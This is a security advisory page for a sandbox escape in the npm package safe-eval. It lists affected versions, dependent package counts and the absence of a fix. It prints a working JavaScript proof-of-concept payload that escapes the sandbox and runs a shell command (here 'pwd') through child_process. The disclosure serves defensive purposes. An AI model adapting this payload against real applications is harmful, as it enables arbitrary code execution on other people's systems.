Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTlwY2YtaDhxOS02M2Y2

Sandbox Breakout / Arbitrary Code Execution in safe-eval

All versions of safe-eval are vulnerable to Sandbox Escape leading to Remote Code Execution. A payload chaining a function's callee and caller constructors can escape the sandbox and execute arbitrary code.

For example, the payload

((() => { 
const targetKey = Object.keys(this)[0]; 
Object.defineProperty(this, targetKey, { 
get: function() { 
return arguments.callee.caller.constructor( 
"return global.process.mainModule.require('child_process').execSync('pwd').toString()" 
)(); 
} 
}); 
})();```
may be used to print the `pwd` to the console.


## Recommendation

No fix is currently available. Consider using an alternative package until a fix is made available.

Permalink: https://github.com/advisories/GHSA-9pcf-h8q9-63f6
JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTlwY2YtaDhxOS02M2Y2
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: over 3 years ago
Updated: over 1 year ago

Identifiers: GHSA-9pcf-h8q9-63f6
References:

Blast Radius: 0.0

Affected Packages

npm:safe-eval

Dependent packages: 264
Dependent repositories: 2,730
Downloads: 116,601 last month
Affected Version Ranges: >= 0.0.0
No known fixed version
All affected versions: 0.0.0, 0.1.0, 0.2.0, 0.3.0, 0.4.0, 0.4.1